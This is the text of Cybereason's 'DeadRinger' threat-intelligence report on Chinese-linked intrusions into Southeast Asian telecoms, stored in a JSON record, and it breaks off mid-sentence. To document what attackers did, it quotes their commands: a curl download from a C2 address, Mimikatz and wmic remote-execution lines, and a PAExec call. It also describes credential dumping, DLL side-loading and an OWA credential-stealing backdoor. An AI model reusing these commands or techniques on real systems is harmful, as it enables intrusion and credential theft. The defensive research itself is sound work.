{ "id": "8cff401f-d0c5-45fd-bff9-e584f644a7e8", "created_at": "2026-04-06T00:17:00.459806Z", "updated_at": "2026-04-10T03:37:21.726753Z", "deleted_at": null, "sha1_hash": "f4daa44acca79a8008c87139d620169459af59a0", "title": "DeadRinger: Exposing Chinese Threat Actors Targeting Major Telcos", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4042045, "plain_text": "DeadRinger: Exposing Chinese Threat Actors Targeting Major Telcos\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-02 11:57:48 UTC\r\nFollowing the discovery of Hafnium attacks targeting Microsoft Exchange vulnerabilities, the Cybereason Nocturnus and\r\nIncident Response teams proactively hunted for various threat actors trying to leverage similar techniques in-the-wild. In the\r\nbeginning of 2021, the Cybereason Nocturnus Team investigated clusters of intrusions detected targeting the\r\ntelecommunications industry across Southeast Asia. During the investigation, three clusters of activity were identified and\r\nshowed significant connections to known threat actors, all suspected to be operating on behalf of Chinese state interests.\r\nThe report comes on the heels of the Biden administration’s public rebuke of China’s Ministry of State Security for the\r\nrecent HAFNIUM attacks that exploited vulnerabilities in unpatched Microsoft Exchange Servers and put thousands of\r\norganizations worldwide at risk. Exploitation of these same vulnerabilities were central to the success of the attacks detailed\r\nin this research.\r\nBased on our analysis, we assess that the goal of the attackers behind these intrusions was to gain and maintain continuous\r\naccess to telecommunication providers and to facilitate cyber espionage by collecting sensitive information, compromising\r\nhigh-profile business assets such as the billing servers that contain Call Detail Record (CDR) data, as well as key network\r\ncomponents such as the Domain Controllers, Web Servers and Microsoft Exchange servers.\r\nDeadRinger Overview Video\r\nCluster A: Assessed to be operated by Soft Cell, an activity group in operation since 2012, previously\r\nattacking Telcos in multiple regions including Southeast Asia, which was first discovered by Cybereason in\r\n2019. We assess with a high level of confidence that the Soft Cell activity group is operating in the interest of\r\nChina. The activity around this cluster started in 2018 and continued through Q1 2021.\r\nCluster B: Assessed to be operated by the Naikon APT threat actor, a highly active cyber espionage group in\r\noperation since 2010 which mainly targets ASEAN countries. The Naikon APT group was previously\r\nattributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical\r\nReconnaissance Bureau (Military Unit Cover Designator 78020). The activity around this cluster was first\r\nobserved in Q4 2020 and continued through Q1 2021.\r\nCluster C: A “mini-cluster” characterized by a unique OWA backdoor that was deployed across multiple\r\nMicrosoft Exchange and IIS servers. Analysis of the backdoor shows significant code similarities with a\r\npreviously documented backdoor observed being used in the operation dubbed Iron Tiger, which was\r\nattributed to a Chinese threat actor tracked by various researchers as Group-3390 (APT27 / Emissary Panda).\r\nThe activity around this cluster was observed between 2017 and Q1 2021.\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 1 of 26\n\nThe correlation between the three clusters\r\nIt is noteworthy to mention that the Cybereason Nocturnus Team also observed an interesting overlap among the three\r\nclusters: In some instances, all three clusters of activity were observed in the same target environment, around the same\r\ntimeframe, and even on the same endpoints. At this point, there is not enough information to determine with certainty the\r\nnature of this overlap -- namely, whether these clusters represent the work of three different threat actors working\r\nindependently, or whether these clusters represent the work of three different teams operating on behalf of a single threat\r\nactor. Regardless, we do offer several plausible hypotheses that might account for this observation. \r\nWe hope that the information provided in this report will assist in shedding light on further related intrusions, and as time\r\ngoes by more information will be made available with regard to the connection between the clusters, the suspected threat\r\nactors, and the relationship between them. \r\nDeadringer: Key Findings\r\nAdaptive, Persistent and Evasive: The highly adaptive attackers worked diligently to obscure their activity\r\nand maintain persistence on the infected systems, dynamically responding to mitigation attempts after having\r\nevaded security efforts since at least 2017, an indication that the targets are of great value to the attackers.\r\nMicrosoft Exchange Vulnerabilities Exploited: Similar to the HAFNIUM attacks, the threat actors exploited\r\nrecently disclosed vulnerabilities in Microsoft Exchange Servers to gain access to the targeted networks. They\r\nthen proceeded to compromise critical network assets such as Domain Controllers (DC) and billing systems\r\nwhich contain highly sensitive information like Call Detail Record (CDR) data, allowing them access to the\r\nsensitive communications of anyone using the affected telecoms’ services. \r\nHigh Value Espionage Targets: Based on previous findings from the Operation Soft Cell Report Cybereason\r\npublished in 2019, as well as other published analysis of operations conducted by these threat actors, it is\r\nassessed that the telecoms were compromised in order to facilitate espionage against select targets. These\r\ntargets are likely to include corporations, political figures, government officials, law enforcement agencies,\r\npolitical activists and dissident factions of interest to the Chinese government.\r\nOperating in the Interest of China: Three distinct clusters of attacks have varying degrees of connection to\r\nAPT groups Soft Cell, Naikon and Group-3390 -- all known to operate in the interest of the Chinese\r\ngovernment. Overlaps in attacker TTPs across the clusters are evidence of a likely connection between the\r\nthreat actors, supporting the assessment that each group was tasked with parallel objectives in monitoring the\r\ncommunications of specific high value targets under the direction of a centralized coordinating body aligned\r\nwith Chinese state interests.\r\nAcknowledgements\r\nResearch papers such as this one require collaboration and vigilance from multiple groups within the company. While the\r\nbulk of the report was produced by Cybereason Nocturnus researchers Lior Rochberger, Tom Fakterman, Daniel Frank and\r\nAssaf Dahan, this research has not been possible without the tireless effort, analysis, attention to details and contribution of\r\nthe Cybereason Incident Response and Security Operations teams. Special thanks and appreciation goes to Matt Hart,\r\nAkihiro Tomita, Yusuke Shimizu, Fusao Tanida, Niv Yona, Eli Salem, Ilan Sokolovsky, and Omer Yampel. \r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 2 of 26\n\nWe invite you to join us for a webinar on Thursday, August 12th, at 1:00 PM ET / 10:00 AM PT where Cybereason's Head\r\nof Threat Research Assaf Dahan and VP of Security Practices Mor Levi will walk through the espionage operations\r\nuncovered in the DeadRinger report.\r\nTable of Contents\r\nExecutive Summary \r\nKey Findings \r\nCluster A: Suspected Soft Cell Activity (2018-2021+) \r\nPhase 1: Key Detected Activity\r\nPhase 2: Significant Changes in TTPs\r\nPhase 3: Significant Changes in TTPs\r\nPhase 4: Significant Changes in TTPs\r\nSimilarities to Operation Soft Cell\r\nCluster B: Suspected Naikon APT Activity \r\nMaintaining Foothold: The Nebulae Backdoor\r\nLiving Off the Land - Using Built-In WindowsTools\r\nLateral Movement: PAExec\r\nLateral Movement: WMI and Net use\r\nCredential theft Mimikatz\r\nCredential Theft: EnrollLoger Keylogger\r\nCluster C: OWA Backdoor Activity (Mini-Cluster) \r\nCustom OWA Backdoor - Core Functionality\r\nSimilarities with Iron Tiger OWA Backdoors\r\nConnections to Winnti’s Tools and Infrastructure\r\nPossible Connection Between Tropic Trooper and Soft Cell\r\nAttributing Clusters A, B and C\r\nA Note on CTI Attribution\r\nConclusion \r\nMITRE ATT\u0026CK BREAKDOWN (Cluster A - Soft Cell Activity) \r\nMITRE ATT\u0026CK BREAKDOWN (Cluster B - Suspected Naikon APT Activity) \r\nMITRE ATT\u0026CK BREAKDOWN (Cluster C - Custom OWA Backdoor) \r\nCluster A: Suspected Soft Cell Activity (2018-2021+)\r\nFollowing up on Cybereason’s discovery of the Soft Cell activity group in 2019, the Nocturnus Team continued to track the\r\ngroup’s activity and related breaches, which led us to find evidence that the group continued its operation - targeting Telcos\r\nin various regions, especially in Southeast Asian countries, all the way to mid-2021. \r\nSimilar to our 2019 report, the attackers practiced the “Low and Slow“ approach, allowing them to maintain access and\r\nconduct their activity clandestinely without alerting the end users nor the security teams. Based on our investigation, this\r\ncluster consisted of four main phases, with earliest signs of intrusion going back to 2018. \r\nEach phase of the operation demonstrates the attackers’ adaptiveness in how they responded to various mitigation efforts,\r\nchanging infrastructure, toolsets, and techniques while attempting to become more stealthy. Though the attackers did change\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 3 of 26\n\nsome of their tools and techniques since their exposure, their core modus operandi and tools still seem to be inline with our\r\nprevious findings. \r\nFrom the telemetry and forensic evidence available to us, it appears that the attackers gained initial access to the network by\r\nexploiting several vulnerabilities in Microsoft Exchange servers, including the recent set of vulnerabilities published by\r\nMicrosoft in March 2021. It is noteworthy to mention that it appears the attackers had exploited the recent Microsoft\r\nExchange vulnerabilities long before they became publicly known:\r\nTimeline of the attack - Cluster 1\r\nPhase 1: Key Detected Activity \r\nEach phase starts with the exploitation of several Microsoft Exchange server vulnerabilities which grant the attackers an\r\ninitial foothold on the targeted network, ultimately allowing them to compromise additional assets. Following the\r\nexploitation, the attackers installed the China Chopper WebShell on the compromised server and used it to perform a variety\r\nof tasks at each phase. In the first phase, the attackers mainly focused on reconnaissance activity, mapping out the network\r\nand identifying critical assets. In addition, they deployed other tools that allowed them to harvest credentials, move laterally\r\nin the network, and exfiltrate data:\r\nChina Chopper WebShell activity as seen in the Cybereason Defense Platform\r\nIt is interesting to note that initially the attackers staged many of their tools in the $RECYCLE.BIN folder, in an attempt to\r\nhide them from users and potentially avoid automatic detection by certain security tools. The exact same technique was also\r\ndocumented by Cybereason in our 2019 report Operation Soft Cell:\r\nReconnaissance\r\nDuring the reconnaissance phase, the attackers used various built-in Windows tools such as net, query, whoami, tasklist,\r\nhostname, and ping for internal and external connectivity checks:\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 4 of 26\n\nReconnaissance commands executed via China Chopper WebShell\r\nIn addition, the attackers used different scripts for reconnaissance. For example, one of the scripts is called “test.bat” and\r\nwas used to execute PortQry, a command-line utility that helps troubleshoot TCP/IP connectivity issues that reports the\r\nstatus of TCP and UDP ports on a remote machine, which can also be used for Active Directory reconnaissance. The binary\r\nitself was renamed to “psc.exe” by the attacker, probably in an attempt to avoid detection.\r\nThe second script found was psloglist.bat, which runs Microsoft’s Sysinternals PsLogList tool and saves the security logs\r\nfrom the event viewer from the last 10 days:\r\nThe content of psloglist.bat\r\nCredential theft\r\nThroughout the operation, the attackers used various tools and techniques to harvest credentials. The most common tool they\r\nused is the notorious Mimikatz. In the first phase, the attackers used the well-known PowerShell Empire Invoke-Mimikatz\r\nscript, which was stored in the same directory as the WebShell itself:\r\nMalware alert for nm.sp1 - PowerShell Empire invoke Mimikatz script\r\nThe credentials were sent back to the attackers and were used for lateral movement and privilege escalation.\r\nLateral Movement\r\nThe attackers used different methods and tools to move laterally to different endpoints on the network, such as Cobalt Strike\r\nimplants, WMI and Net Use. \r\nWMI and Net Use\r\nThe attackers used the command “net use” to configure connections to shared resources on the network, and to copy their\r\ntools to different systems. After the tools were copied, the attackers were able to execute them remotely using WMI and by\r\ncreating scheduled tasks remotely to run them:\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 5 of 26\n\nNet Use commands as seen in the Cybereason Defense Platform\r\nCreation of remote scheduled tasks\r\nExecuting scripts remotely using WMI\r\nData Exfiltration\r\nIn an attempt to hide the contents of the stolen data, the threat actors compressed and password-protected the data using the\r\nWinRAR tool. The RAR files were then placed in the C:\\users\\SUPPORT_388945a0\\Documents folder. This folder belongs\r\nto a built-in user account (SUPPORT_388945a0) that is used for help and support service, which is disabled by default but\r\nwas purposefully enabled by the attacker. The data was then exfiltrated using the China Chopper WebShell. \r\nIt is also interesting to mention that the nefarious use of this specific account (SUPPORT_388945a0) was previously seen\r\nwith the Chinese APT3 and the Iranian Leafminer threat actors:\r\nEvidence of archived collected data using China Chopper\r\nKnowing what data the attackers tried to exfiltrate can sometimes shed light on the attackers’ motivations. In our previous\r\nreport about Soft Cell, we were able to determine that the attackers exfiltrated CDR data from telecommunication providers\r\nin order to facilitate cyber espionage against specific individuals. \r\nMaintaining Foothold: PcShare Backdoor\r\nAside from the China Chopper WebShell, the attackers relied heavily on a known backdoor named PcShare, whose code is\r\npublicly available and was reported being mostly used by Chinese threat actors attacking Southeast Asian countries. PcShare\r\nhas the following capabilities:\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 6 of 26\n\nControlling the file system\r\nManipulation of system services\r\nUploading and downloading files \r\nProcess manipulation\r\nManipulating the Windows Registry\r\nExecuting arbitrary commands using Windows CMD Shell\r\nRebooting/shutting down the system\r\nDisplay message boxes to the user\r\nPcShare was executed via a Loader DLL (NvSmartMax.dll) and a Payload (NvSmartMax.dat) attempting to masquerade as\r\na legitimate module by NVIDIA named “NvSmartMax.dll”: “NVIDIA Smart Maximise Helper Host” application (part of\r\nNVIDIA GPU graphics driver).\r\nIn most cases, the attackers used the legitimate nvSmarEx.exe to side-load the loader DLL (“NvSmartMax.dll”). The loader\r\nthen decrypts the PcShare core payload (“NvSmartMax.dat”) placed on the same directory. Interesting to note, the payload\r\n.dat file that was used during this attack has the exact same hash mentioned in a report by BlackBerry from 2019, detailing\r\nthe same execution technique used to stealthily load PcShare into memory. \r\nCybereason observed that in addition to what was reported by BlackBerry, the NvSmartMax.dll was also executed directly\r\nvia rundll32.exe in certain instances:\r\nPcShare execution graph\r\nThe execution of the backdoor on the remote machine revealed additional activities performed by the attackers, including:\r\nReconnaissance activity to collect information about the endpoint and network\r\nSearching for security tools and attempting to disable or kill their processes\r\nCreating two scheduled tasks for the Cobalt Strike loader: Microsoft\\Windows\\Wininet\\Config and\r\nMicrosoft\\Windows\\WindowsColorSystem\\Config\r\nUsing PowerShell to alter the creation time of the Cobalt Strike loader and payload files, a technique called\r\ntimestomping, which is used for detection evasion\r\nExecuting the Cobalt Strike loader\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 7 of 26\n\nThe execution of the PcShare backdoor as seen in the Cybereason Defense Platform\r\nPcShare Continuously in Use Since 2018\r\nOur investigation revealed that the attackers were operating in the target network for at least two and a half years before\r\nCybereason was deployed on the environment. One piece of evidences that the attackers were present in the network from\r\n2018 is the creation time of the PcShare binary:\r\n \r\nCreation time of the PcShare backdoor as seen in the Cybereason Defense Platform\r\nAnother piece of evidence that supports the assessment that the attackers were inside the network since 2018 is that the same\r\nIP address that was hard-coded inside the PcShare backdoor mentioned above was also used in a scheduled task. The\r\nscheduled task used curl.exe binary in order to download a payload (a CAB file that contains the file “nvSmartEx.exe”)\r\nfrom the mentioned C2 and save it in the recycle.bin folder:\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 8 of 26\n\nScheduled task - [cmd.exe /c c:\\$recycle.bin\\curl.exe http://45.123.118[.]232/1.txt \u003ec:\\$recycle.bin\\1.txt]\r\nThe same IP address, embedded inside the PcShare binary\r\nIn addition to the scheduled task above, the attackers created another scheduled task with the same name (VV1) on other\r\nmachines in the network. This task was different from the one above, and it was used to execute a bat script located under\r\nc:\\$recycle.bin\\q.bat, also created by the attackers.\r\nInstalling a VPN\r\nIn order to maintain persistence in the network and create easy access point to the network, the attackers installed SoftEther\r\nVPN, which they renamed to “oracll.exe” in order to evade detection. SoftEther helps disguise the traffic as benign on the\r\ntarget network. The same VPN client was previously observed in attacks involving the Soft Cell activity group:\r\nRenamed SoftEther VPN binary\r\nPhase 2: Changes in TTPs\r\nIn addition to the activities performed in the first phase, such as reconnaissance activity or the use of PcShare and WMI - the\r\nattackers also used tools that were not used by them in the previous phase.\r\nThe attackers used a tool called Local Group, which is useful for adding and enumerating users in a domain, and a different\r\nMimikatz, this time using a DLL search order hijacking technique.\r\nThe attackers used the Local Group binary lg.exe with the command “-lu” that, according to the usage guide, enumerates all\r\nlocal groups and members on a domain. This was executed remotely on the DC server, and the output was saved into “1.txt”:\r\nExecuting lg.exe - local group, and saving the output to 1.txt\r\nAs mentioned, the attackers used the DLL search order hijacking technique in order to load Mimikatz. To do so, the\r\nattackers replaced the legitimate DLL “mscorsvc.dll” and then executed the binary “mscorsvw.exe” which loads this DLL:\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 9 of 26\n\nPreparing the files for DLL search order hijacking of the malicious mscorsvc.dll\r\nFrom the activities observed, the DLL executed Mimikatz, performed Pass-the-Hash and credential dumping, and performed\r\nsome reconnaissance commands using “net user”:\r\nExecution of the mscorsvw.exe process with the malicious search order hijacked DLL, mscorsvc.dll\r\nPhase 3: Changes in TTPs\r\nThe third phase shares similarities with the initial phases, yet has its own unique characteristics, namely, with the\r\nintroduction of new tools that were not observed in the previous phases.\r\nThose tools include a script used for AD database dumping, NBTScan, Dump Event Log tool, and again, a new Mimikatz\r\nexecutable. The attackers ran a script named a.bat remotely on several DCs, which is used to dump the Active Directory\r\nDatabase file (ntds.dit) using NTDSUTIL’s IFM Creation (VSS shadow copy):\r\nThe creation, execution and deletion of a.bat\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 10 of 26\n\nThe execution of a.bat as seen in the Cybereason Defense Platform\r\nThe attackers extended their reconnaissance activity in phase three by executing NBTScan (named smnbt.exe), which is\r\nused for scanning IP networks for NetBIOS naming information, in addition to other native tools such as query.exe and\r\ndsget.exe:\r\nExecution of the WebShell as seen in the Cybereason Defense Platform\r\nAs observed in the other phases, the attackers harvested credentials using Mimikatz, but this time it was an executable (.exe)\r\nfile named s6.exe and 26.exe (both have the same hash). The process was executed both by the WebShell and by using\r\nWMI. The output was saved into a file named “1.txt” and “log.log”, and later sent to the attackers:\r\nSaving the output of Mimikatz to 1.txt and log.log\r\nPhase 4: Changes in TTPs\r\nThe only addition observed between phase four compared to previous phases is that the attackers once again used a different\r\nMimikatz executable named d64.exe. It was found in both folders: c:\\windows\\d64.exe and c:\\compaq\\d64.exe:\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 11 of 26\n\nPrevention of d64.exe - Mimikatz\r\nSimilarities to Operation Soft Cell\r\nDuring the investigation, there were significant similarities to the activity described in Operation Soft Cell. Here are some of\r\nthe similarities between the investigations:\r\nCategory\r\nCluster A: Suspected Soft Cell\r\nActivity\r\nOperation Soft Cell \r\nNaming\r\nconvention\r\nTools saved under C:\\PerfLogs\\\r\nC:\\perflogs\\s6.exe (Mimikatz)\r\nc:\\perflogs\\msnbt.exe (NBTScan)\r\nc:\\perflogs\\lg.exe (Local Group)\r\nTools saved under C:\\PerfLogs\\\r\nC:\\perflogs\\pl6.exe (Mimikatz)\r\nC:\\perflogs\\nbt.exe (NBTScan)\r\nc:\\perflogs\\lg.exe (Local Group)\r\nMimikatz execution:\r\n\"cmd\" /c cd /d C:\\PerfLogs\\\u0026s6.exe\r\n\u003e1.txt\u0026echo [S]\u0026cd\u0026echo [E]\r\nMimikatz execution:\r\n\"cmd\" /c cd /d C:\\PerfLogs\\\u0026pl6.exe \u003e 1.txt\u0026echo\r\n[S]\u0026cd\u0026echo [E]\r\nRunning a script named “a.bat”\r\nremotely, using WMI:\r\nwmic /node:[REDACTED] process call\r\ncreate a.bat\u0026echo [S]\u0026cd\u0026echo [E]\r\nRunning a script named “a.bat” remotely, using WMI:\r\nwmic /node:[REDACTED] /user:\"[REDACTED]\"\r\n/password:\"[REDACTED]\" process call create\r\na.bat\u0026echo [S]\u0026cd\u0026echo [E]\r\nShared tools\r\nused\r\nLocal Group (renamed “lg.exe” in both cases)\r\nPortQry (renamed “psc.exe” in both cases)\r\nSoftEther VPN (renamed in both cases)\r\nNBTScan (renamed in both cases)\r\nChina Chopper WebShell\r\nCobalt Strike Payloads\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 12 of 26\n\nNET commands\r\nModified Mimikatz\r\nWMI\r\nTechniques /\r\nprocedures\r\nExploiting the Exchange server every few months\r\nChange IOCs between phases\r\nHiding tools in the recycle.bin folder\r\nUse of the DLL search order hijacking technique\r\nRenaming binaries\r\nIn addition to the similarities observed among TTPs, there was another connection to the original Soft Cell report. In\r\nfollowing the infrastructure of the Soft Cell activity group and analyzing their tools, one tool got our attention: d64.exe, the\r\nMimikatz binary observed in phase 4. This file’s PDB pattern is very similar to other tools observed in the Operation Soft\r\nCell report and related samples:\r\nPDB path observed in d64.exe PDB found in previous Soft Cell binaries\r\nE:\\vs_proj\\mimkTools\\dcsync_new\\x64\\dcsync64.pdb\r\nE:\\simplify_modify\\x64\\simplify.pdb\r\nE:\\vs_proj\\simplify_modify\\Win32\\simplify.pdb\r\nPivoting from the files observed in the attack, other malicious files with the same PDB patterns (“E:\\vs_proj\\*” and\r\n\"E:\\simplify_modify\\*\") were found which could be part of the Soft Cell activity group arsenal. Please refer to Appendix A\r\nfor further details.\r\nCluster B: Suspected Naikon APT Activity\r\nDuring our investigation, as more evidence was collected, Cybereason identified another cluster of activity targeting Telcos\r\nin ASEAN countries. This cluster exhibits rather unique TTPs compared to the ones detailed in Cluster A; namely the use of\r\ndifferent tools and C2 server infrastructure. In addition, this cluster’s activity was first observed in Q4 of 2020, while Cluster\r\nA goes back to 2018. \r\nThe main tool used in this cluster is the newly discovered Nebulae backdoor, which according to BitDefender is attributed to\r\nthe Naikon APT group. In addition, the attackers deployed a previously undocumented keylogger dubbed “EnrollLoger” on\r\nselected high-profile assets, most likely to obtain sensitive information and to harvest credentials of high-privilege user\r\naccounts. \r\nAs previously mentioned, while Cluster B has its unique characteristics that separate it from Cluster A, there were some\r\noverlaps observed in terms of the victimology, time frame, the endpoints and some generic tools that were also observed in\r\ncluster A. \r\nMaintaining Foothold: The Nebulae Backdoor\r\nOne of the unique tools spotted in the course of the attack is the rare Nebulae backdoor, which was first reported in April\r\n2021 and attributed to the Naikon group. The attackers evidently tried to evade detection by executing the backdoor in the\r\ncontext of legitimate and trusted applications that are vulnerable to DLL Side-Loading. \r\nFor example, the attackers used the legitimate “chrome_frame_helper.exe” - which is part of Google's “Google Chrome\r\nFrame” - to load the fake module “chrome_frame_helper.dll”, which contained the Nebulae backdoor payload:\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 13 of 26\n\nNebulae Backdoor execution as seen in the Cybereason Defense Platform\r\nOnce Cybereason blocked and quarantined “chrome_frame_helper.dll”, the attackers immediately adapted by deploying the\r\nNebulae backdoor via a new legitimate application that is vulnerable to DLL Side-Loading. This time the attackers used\r\n“patchwrap.exe” which is a “Symantec Client Management Component” that loads the malicious module “atl110.dll”. \r\nAs displayed below in the Cybereason Defense Platform, the exploitation of trusted security tools and especially anti-virus\r\nsoftware is a very known tactic used by many threat actors: \r\nNebulae Backdoor execution of various tasks as seen in the Cybereason Defense Platform\r\nThe main features of the Nebulae backdoor include:\r\nReconnaissance and information gathering about infected hosts\r\nFile and process manipulation\r\nExecution of arbitrary commands\r\nPrivilege escalation\r\nC2 communications using raw sockets\r\nRC4 data encryption for communication between the C2 and the target\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 14 of 26\n\nAccording to analysis of the backdoor’s code, we suspect that even though the Nebulae backdoor was first reported in April\r\n2021, based on a file uploaded to VT in January 2016, there are indications that first versions of the Nebulae backdoor were\r\nalready being used since 2016:\r\nHistoric submission data of an early Nebulae sample\r\nThe backdoor communicates with the C2 in what seems to be a somewhat custom implementation of an RC4 encryption\r\nalgorithm. Initially it using a XOR key to decrypt the C2:\r\nDecryption of the C2\r\nFollowing this procedure, the malware collects data about the infected machine such as the user and machine names,\r\noperating system version etc., then encrypts it and sends it to the C2. It then awaits further instructions and jumps to the\r\ncorresponding method:\r\nJumptable for code execution according to the appropriate value\r\nReconnaissance\r\nLiving Off the Land - Using Built-In WindowsTools\r\nIn order to collect information about the network and endpoints, the attackers used different built-in Windows tools such as\r\nnet commands, queser, reg, systeminfo, tasklist, netstat, and ping for internal and external connectivity checks. In addition,\r\nthe attackers used system commands in order to perform a Ping scan, using the command “find /i\"ttl” to check for successful\r\nconnections:\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 15 of 26\n\nExecution of legitimate tools for reconnaissance and lateral movement as seen in the Cybereason Defense Platform\r\nLateral Movement\r\nPAExec\r\nThe attackers used a renamed PAExec for lateral movement. PAExec is similar to sysinternal’s PsExec, and it is a\r\nredistributable version of PsExec with some additional options. PAExec was used to connect to remote servers and execute\r\nadditional tools. Both PAExec and PsExec are very common legitimate tools that are seen over and over in the context of\r\ncyberattacks and used by many threat actors:\r\nbackup.exe \\\\\u003cIP Address\u003e cmd.exe\r\nWMI and Net use\r\nThe attackers used the command “net use” in order to access shared network resources on remote machines. Additionally,\r\nWMI was used to execute tools such as the Nebulae Backdoor remotely.:\r\nwmic /node:\u003cIP Address\u003e /user:\u003cUser\u003e /password:\u003cPassword\u003e process call create \"C:\\Program Files\r\n(x86)\\Symantec\\Symantec Endpoint Protection\\PatchWrap.exe\"\r\nCredential theft\r\nThe attackers used sysinternals’ ProcDump and Mimikatz to dump credentials from the domain controllers. \r\nProcDump\r\nProcDump is a tool by Windows Sysinternals that is able to create dumps of processes in the system. The original purpose of\r\nProcDump is to create dumps for troubleshooting issues, however attackers may use the tool in order to dump critical\r\nprocesses like lsass.exe for the purpose of extracting password hashes from its memory:\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 16 of 26\n\nPAExec and ProcDump execution as seen in the Cybereason Defense Platform\r\nMimikatz\r\nThe attackers used Mimikatz that masquerades as Internet Explorer. The metadata of the Mimikatz executable, along with\r\nthe icon, were altered to appear as an Internet explorer binary in an effort to be stealthy. Additionally, another Mimikatz\r\nexecutable similarly masquerades as Google Chrome, and was found among the tools of cluster B:\r\nPAExec and Mimikatz execution as seen in the Cybereason Defense Platform\r\nEnrollLoger Keylogger\r\nOne of the tools used by the attackers was a custom-built keylogger dubbed “EnrollLogger” by Cybereason. In order to hide\r\nthe malicious activity, the attackers deployed a legitimate South-Korean multimedia player called “Potplayer” that has a\r\nknown DLL-hijacking vulnerability, along with a trojanized DLL file called PotPlayer.dll.txt (VT link) that is loaded to\r\nPotplayer.exe upon execution, making it appear legitimate:\r\nKeylogger execution as seen in the Cybereason Defense Platform\r\nAt the time of the attack, the malicious DLL had a very low detection rate: \r\nDetection rate of the keylogger in VirusTotal\r\nThe fake DLL has several empty exports, and the export that contains the malicious code is called PreprocessCmdLineExW. \r\nThe keylogger uses the GetKeyState() function to monitor the users’ keystrokes, saving it to an allocated buffer in memory. \r\nIn addition, the keylogger also steals data stored on Windows’ Clipboard. The collected keystrokes and clipboard data along\r\nwith other information is then XOR-encrypted (each byte with 0xaf if it equals zero, or with 0xaa in case it doesn’t) and\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 17 of 26\n\nsaved in text files located in a directory created by the keylogger: \r\nC:\\Users\\user\\AppData\\Roaming\\Microsoft\\Network\\cache\r\nData saved by the keylogger\r\nAn example of a decrypted file looks like this:\r\nDecrypted data file that was collected by the Keylogger\r\nCluster C: OWA Backdoor Activity (Mini-Cluster)\r\nDuring the investigation, we revealed a third cluster, which is in fact a mini-cluster characterized mainly by the deployment\r\nof multiple instances of a custom OWA (Outlook Web Access) backdoor. The backdoor was used to harvest credentials of\r\nusers logging into Microsoft OWA services, granting the attackers the ability to access the environment stealthily. \r\nAccording to the forensic evidence available to us, the earliest indications of use of this backdoor begin in 2017. The\r\ndeployment of the backdoor continued all the way to 2021, bearing the hallmark of a true advanced persistent threat (APT).\r\nFrom 2017-2020 we have observed only a few instances of the backdoor. However, in March 2021, the attackers installed\r\nthe backdoor on over 20 machines in a short period of time. This interesting uptick could be explained by the fact that the\r\nattackers lost access due to mitigation efforts and needed to re-establish it. Another possible explanation could be related to\r\nMicrosoft releasing patches for the newly discovered Microsoft Exchange Server vulnerabilities, which caused a sharp rise\r\nin attacks against Microsoft Exchange Servers that were unpatched. \r\nCode analysis of this backdoor showed considerable similarities with previously documented backdoors dubbed\r\n“Dllshellexc2007” and “Dllshellexc2010”, which were discovered by TrendMicro in their Operation Iron Tiger report and\r\nattributed to Group-3390 (also tracked by some vendors as APT27, Emissary Panda). According to the Iron Tiger report, the\r\nbackdoor is compatible and can integrate with the China Chopper WebShell. \r\nThe activity of this backdoor however, could not be tied directly to the other clusters, which is why we decided to keep it as\r\na separate cluster. That being said, there were some instances where we have observed this backdoor deployed on the same\r\nvictim as clusters A and B, around the same time frames, and in some cases even on the same endpoints. \r\nGiven these overlaps and the previously documented compatibility of this OWA backdoor with the China Chopper\r\nWebShell, it is possible that Cluster C is somehow related to the activity described in Cluster A, yet a direct connection\r\nbetween the two was not observed in our investigation. \r\nCustom OWA Backdoor - Core Functionality\r\nThe custom .NET backdoor deployed is named “Microsoft.Exchange.Clients.Event.dll” and can be installed on either\r\nMicrosoft Exchange or Internet Information Services (IIS) servers. The main purpose of this backdoor is to harvest\r\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPage 18 of 26\n\ncredentials of any user that authenticates to OWA services. In addition, the backdoor also contains further functionality\r\nsimilar to a WebShell, allowing the attackers to run arbitrary commands, exfiltrate data and deploy additional tools. \r\nThe .NET binary itself is obfuscated with .NET Reactor, which is a code protection and software licensing system. This kind\r\nof obfuscation software is often used by malware authors in an effort to hinder analysis. The backdoor intercepts requests\r\nthat contain “owa/auth.owa'' in the URI (a default login URI for OWA), and steals the login credentials:\r\nThe backdoor checks the URI of the http request\r\nThe backdoor logs the following information from the HTTP requests:\r\nConnection date and time\r\nRemote IP address\r\nUsername and password used to login\r\nUser agent \r\nIn order to protect the stolen data, the backdoor XORes each byte of the collected information with the value “183”, and\r\nsaves the result in base64 encoding to a file named “~ex.dat” in the %temp% directory. If the attacker connects to the server\r\nwith a specifically crafted session id, the attacker's http request is parsed in order to execute various commands, such as: \r\nDownloading additional files \r\nUploading files (for data exfiltration)\r\nDeleting files\r\nExecuting arbitrary 